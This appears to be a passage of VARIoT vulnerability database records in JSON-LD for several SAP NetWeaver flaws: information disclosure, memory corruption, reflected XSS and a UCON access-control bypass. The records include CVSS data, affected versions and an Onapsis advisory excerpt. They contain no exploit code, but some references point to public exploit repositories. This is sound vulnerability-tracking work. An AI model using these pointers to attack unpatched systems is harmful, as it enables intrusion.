"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.27111164
},
"last_update_date": "2023-12-18T12:06:15.819000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "SAP Security Notes February 2016 - Review (2256846)",
"trust": 0.8,
"url": "http://scn.sap.com/community/security/blog/2016/02/11/sap-security-notes-february-2016--review?tb_iframe=true\u0026width=921.6\u0026height=921.6"
},
{
"title": "SAP NetWeaver Universal Worklist Configuration Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=60234"
},
{
"title": "SAP_exploit",
"trust": 0.1,
"url": "https://github.com/vah13/sap_exploit "
},
{
"title": "Exp101tsArchiv30thers",
"trust": 0.1,
"url": "https://github.com/nu11secur1ty/exp101tsarchiv30thers "
},
{
"title": "awesome-cve-poc_qazbnm456",
"trust": 0.1,
"url": "https://github.com/xbl3/awesome-cve-poc_qazbnm456 "
},
{
"title": "The Register",
"trust": 0.1,
"url": "https://www.theregister.co.uk/2022/06/15/microsoft_patch_tuesday/"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2016-2388"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001526"
},
{
"db": "CNNVD",
"id": "CNNVD-201602-298"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-200",
"trust": 1.8
},
{
"problemtype": "CWE-Other",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-001526"
},
{
"db": "NVD",
"id": "CVE-2016-2388"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.8,
"url": "https://www.exploit-db.com/exploits/39841/"
},
{
"trust": 1.7,
"url": "http://seclists.org/fulldisclosure/2016/may/55"
},
{
"trust": 1.7,
"url": "http://packetstormsecurity.com/files/137128/sap-netweaver-as-java-7.5-information-disclosure.html"
},
{
"trust": 1.7,
"url": "https://www.exploit-db.com/exploits/43495/"
},
{
"trust": 1.7,
"url": "https://erpscan.io/press-center/blog/sap-security-notes-february-2016-review/"
},
{
"trust": 1.7,
"url": "https://erpscan.io/advisories/erpscan-16-010-sap-netweaver-7-4-information-disclosure/"
},
{
"trust": 1.7,
"url": "http://packetstormsecurity.com/files/145860/sap-netweaver-j2ee-engine-7.40-sql-injection.html"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-2388"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-2388"
},
{
"trust": 0.8,
"url": "https://erpscan.com/advisories/erpscan-16-010-sap-netweaver-7-4-information-disclosure/"
},
{
"trust": 0.8,
"url": "https://erpscan.com/press-center/blog/sap-security-notes-february-2016-review/"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/200.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://github.com/vah13/sap_exploit"
},
{
"trust": 0.1,
"url": "https://www.securityfocus.com/bid/83219"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2016-2388"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001526"
},
{
"db": "NVD",
"id": "CVE-2016-2388"
},
{
"db": "CNNVD",
"id": "CNNVD-201602-298"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULMON",
"id": "CVE-2016-2388"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001526"
},
{
"db": "NVD",
"id": "CVE-2016-2388"
},
{
"db": "CNNVD",
"id": "CNNVD-201602-298"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2016-02-16T00:00:00",
"db": "VULMON",
"id": "CVE-2016-2388"
},
{
"date": "2016-03-01T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2016-001526"
},
{
"date": "2016-02-16T15:59:02.103000",
"db": "NVD",
"id": "CVE-2016-2388"
},
{
"date": "2016-02-17T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201602-298"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-05-05T00:00:00",
"db": "VULMON",
"id": "CVE-2016-2388"
},
{
"date": "2016-03-01T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2016-001526"
},
{
"date": "2021-05-05T14:01:12.430000",
"db": "NVD",
"id": "CVE-2016-2388"
},
{
"date": "2021-04-29T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201602-298"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201602-298"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver of Universal Worklist Configuration Vulnerability in obtaining important user information",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-001526"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "information disclosure",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201602-298"
}
],
"trust": 0.6
}
}
var-201710-1460
Vulnerability from variot
SAP NetWeaver is prone to an unspecified memory-corruption vulnerability. Attackers can leverage this issue to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions.
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201710-1460",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "0"
}
],
"sources": [
{
"db": "BID",
"id": "101208"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The vendor reported this issue.",
"sources": [
{
"db": "BID",
"id": "101208"
}
],
"trust": 0.3
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver is prone to an unspecified memory-corruption vulnerability.\nAttackers can leverage this issue to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions.",
"sources": [
{
"db": "BID",
"id": "101208"
}
],
"trust": 0.3
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "BID",
"id": "101208",
"trust": 0.3
}
],
"sources": [
{
"db": "BID",
"id": "101208"
}
]
},
"id": "VAR-201710-1460",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.26917922
},
"last_update_date": "2022-05-17T01:50:56.458000Z",
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 0.3,
"url": "http://www.sap.com"
},
{
"trust": 0.3,
"url": "https://launchpad.support.sap.com/#/notes/2509284"
},
{
"trust": 0.3,
"url": "https://blogs.sap.com/2017/10/10/sap-security-patch-day-october-2017/"
}
],
"sources": [
{
"db": "BID",
"id": "101208"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "101208"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-10-10T00:00:00",
"db": "BID",
"id": "101208"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-10-10T00:00:00",
"db": "BID",
"id": "101208"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "network",
"sources": [
{
"db": "BID",
"id": "101208"
}
],
"trust": 0.3
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver Instance Agent Service Memory Corruption Vulnerability",
"sources": [
{
"db": "BID",
"id": "101208"
}
],
"trust": 0.3
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Unknown",
"sources": [
{
"db": "BID",
"id": "101208"
}
],
"trust": 0.3
}
}
var-202110-0810
Vulnerability from variot
SAP NetWeaver - versions 700, 701, 702, 730, does not sufficiently encode user-controlled inputs, allowing an attacker to cause a potential victim to supply a malicious content to a vulnerable web application, which is then reflected to the victim and executed by the web browser, resulting in Cross-Site Scripting vulnerability. SAP NetWeaver Exists in a cross-site scripting vulnerability.Information may be obtained and information may be tampered with
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202110-0810",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 1.8,
"vendor": "sap",
"version": "700"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.8,
"vendor": "sap",
"version": "730"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.8,
"vendor": "sap",
"version": "701"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.8,
"vendor": "sap",
"version": "702"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": null
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-013686"
},
{
"db": "NVD",
"id": "CVE-2021-38183"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:700:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:701:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:702:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:730:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2021-38183"
}
]
},
"cve": "CVE-2021-38183",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": true,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 4.3,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2021-38183",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 6.1,
"baseSeverity": "Medium",
"confidentialityImpact": "Low",
"exploitabilityScore": null,
"id": "CVE-2021-38183",
"impactScore": null,
"integrityImpact": "Low",
"privilegesRequired": "None",
"scope": "Changed",
"trust": 0.8,
"userInteraction": "Required",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2021-38183",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-202110-780",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2021-38183",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2021-38183"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-013686"
},
{
"db": "NVD",
"id": "CVE-2021-38183"
},
{
"db": "CNNVD",
"id": "CNNVD-202110-780"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver - versions 700, 701, 702, 730, does not sufficiently encode user-controlled inputs, allowing an attacker to cause a potential victim to supply a malicious content to a vulnerable web application, which is then reflected to the victim and executed by the web browser, resulting in Cross-Site Scripting vulnerability. SAP NetWeaver Exists in a cross-site scripting vulnerability.Information may be obtained and information may be tampered with",
"sources": [
{
"db": "NVD",
"id": "CVE-2021-38183"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-013686"
},
{
"db": "VULMON",
"id": "CVE-2021-38183"
}
],
"trust": 1.71
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2021-38183",
"trust": 3.3
},
{
"db": "JVNDB",
"id": "JVNDB-2021-013686",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-202110-780",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2021-38183",
"trust": 0.1
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2021-38183"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-013686"
},
{
"db": "NVD",
"id": "CVE-2021-38183"
},
{
"db": "CNNVD",
"id": "CNNVD-202110-780"
}
]
},
"id": "VAR-202110-0810",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.27111164
},
"last_update_date": "2023-12-18T12:42:17.929000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top\u00a0Page",
"trust": 0.8,
"url": "https://www.sap.com/index.html"
},
{
"title": "SAP Netweaver Fixes for cross-site scripting vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=166534"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-013686"
},
{
"db": "CNNVD",
"id": "CNNVD-202110-780"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-79",
"trust": 1.0
},
{
"problemtype": "Cross-site scripting (CWE-79) [NVD evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-013686"
},
{
"db": "NVD",
"id": "CVE-2021-38183"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.7,
"url": "https://launchpad.support.sap.com/#/notes/3084937"
},
{
"trust": 1.7,
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageid=587169983"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-38183"
},
{
"trust": 0.6,
"url": "https://vigilance.fr/vulnerability/sap-multiple-vulnerabilities-of-october-2021-36632"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/79.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2021-38183"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-013686"
},
{
"db": "NVD",
"id": "CVE-2021-38183"
},
{
"db": "CNNVD",
"id": "CNNVD-202110-780"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULMON",
"id": "CVE-2021-38183"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-013686"
},
{
"db": "NVD",
"id": "CVE-2021-38183"
},
{
"db": "CNNVD",
"id": "CNNVD-202110-780"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-10-12T00:00:00",
"db": "VULMON",
"id": "CVE-2021-38183"
},
{
"date": "2022-09-26T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2021-013686"
},
{
"date": "2021-10-12T15:15:08.993000",
"db": "NVD",
"id": "CVE-2021-38183"
},
{
"date": "2021-10-12T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202110-780"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-10-19T00:00:00",
"db": "VULMON",
"id": "CVE-2021-38183"
},
{
"date": "2022-09-26T03:04:00",
"db": "JVNDB",
"id": "JVNDB-2021-013686"
},
{
"date": "2021-10-19T00:30:25.520000",
"db": "NVD",
"id": "CVE-2021-38183"
},
{
"date": "2021-10-20T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202110-780"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202110-780"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP\u00a0NetWeaver\u00a0 Cross-site scripting vulnerability in",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-013686"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "XSS",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202110-780"
}
],
"trust": 0.6
}
}
var-201610-0154
Vulnerability from variot
SAP Netweaver 7.4 allows remote authenticated users to bypass an intended Unified Connectivity (UCON) access control list and execute arbitrary Remote Function Modules (RFM) by leveraging a connection created from earlier execution of an anonymous RFM included in a Communication Assembly, aka SAP Security Note 2139366. Vendors have confirmed this vulnerability SAP Security Note 2139366 It is released as. Supplementary information : CWE Vulnerability type by CWE-284: Improper Access Control ( Inappropriate access control ) Has been identified. SAP NetWeaver is prone to a security-bypass vulnerability. Remote attackers can exploit this issue to bypass certain security restrictions and gain unauthorized access to the application. SAP NetWeaver 7.4 is vulnerable; other versions may also be affected. Onapsis Security Advisory ONAPSIS-2016-002: SAP UCON Security Protection bypass
1. Impact on Business
By exploiting this vulnerability, an attacker could bypass protections implemented in the SAP systems, potentially executing arbitrary business processes.
Risk Level: Medium
2. Advisory Information
- Public Release Date: 09/22/2016
- Last Revised: 09/22/2016
- Security Advisory ID: ONAPSIS-2016-002
- Onapsis SVS ID: ONAPSIS-00165
- CVE: CVE-2016-3635
- Researcher: Sergio Abraham and Pablo Muller
- Vendor Provided CVSS v2: 6.0 (AV:N/AC:M/Au:S/C:P/I:P/A:P)
- Onapsis CVSS v2: 6.0 (AV:N/AC:M/Au:S/C:P/I:P/A:P)
3. Vulnerability Information
- Vendor: SAP AG
- Affected Components: SAP Netweaver 7.4
- Vulnerability Class: Improper Access Control (CWE-284)
- Remotely Exploitable: Yes
- Locally Exploitable: No
- Authentication Required: Yes
-
Original Advisory: https://www.onapsis.com/research/security-advisories/sap-ucon-security-protection-bypass
-
Those RFMs are in the final phase of UCON implementation and not included in a Communication Assembly (CA). That means that no user (regardless its privileges) should be able to execute those RFMs.
7. Report Timeline
- 03/03/2015: Onapsis provides vulnerability information to SAP AG.
- 10/03/2015: SAP reported fix is In Process.
- 14/04/2015: SAP reported fix is In Process.
- 12/05/2015: SAP reported fix is In Process.
- 09/06/2015: SAP reported fix is In Process.
About Onapsis Research Labs
Onapsis Research Labs provides the industry analysis of key security issues that impact business-critical systems and applications. Delivering frequent and timely security and compliance advisories with associated risk levels, Onapsis Research Labs combine in-depth knowledge and experience to deliver technical and business-context with sound security judgment to the broader information security community.
About Onapsis, Inc.
Onapsis provides the most comprehensive solutions for securing SAP and Oracle enterprise applications. As the leading experts in SAP and Oracle cyber-security, Onapsis enables security and audit teams to have visibility, confidence and control of advanced threats, cyber-risks and compliance gaps affecting their enterprise applications.
Headquartered in Boston, Onapsis serves over 180 Global 2000 customers, including 10 top retailers, 20 top energy firms and 20 top manufacturers. Onapsis solutions are also the de-facto standard for leading consulting and audit firms such as Accenture, IBM, Deloitte, E&Y, KPMG and PwC.
Onapsis solutions include the Onapsis Security Platform, which is the most widely-used SAP-certified cyber-security solution in the market. Unlike generic security products, Onapsis context-aware solutions deliver both preventative vulnerability and compliance controls, as well as real-time detection and incident response capabilities to reduce risks affecting critical business processes and data. Through open interfaces, the platform can be integrated with leading SIEM, GRC and network security products, seamlessly incorporating enterprise applications into existing vulnerability, risk and incident response management programs.
These solutions are powered by the Onapsis Research Labs which continuously provide leading intelligence on security threats affecting SAP and Oracle enterprise applications. Experts of the Onapsis Research Labs were the first to lecture on SAP cyber-attacks and have uncovered and helped fix hundreds of security vulnerabilities to-date affecting SAP Business Suite, SAP HANA, SAP Cloud and SAP Mobile applications, as well as Oracle JD Edwards and Oracle E-Business Suite platforms.
For more information, please visit www.onapsis.com, or connect with us on Twitter, Google+, or LinkedIn.
-- This email and any files transmitted with it are confidential and intended solely for the use of the individual or entity to whom they are addressed. If you have received this email in error please notify the system manager. This message contains confidential information and is intended only for the individual named. If you are not the named addressee you should not disseminate, distribute or copy this e-mail. Please notify the sender immediately by e-mail if you have received this e-mail by mistake and delete this e-mail from your system. If you are not the intended recipient you are notified that disclosing, copying, distributing or taking any action in reliance on the contents of this information is strictly prohibited
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
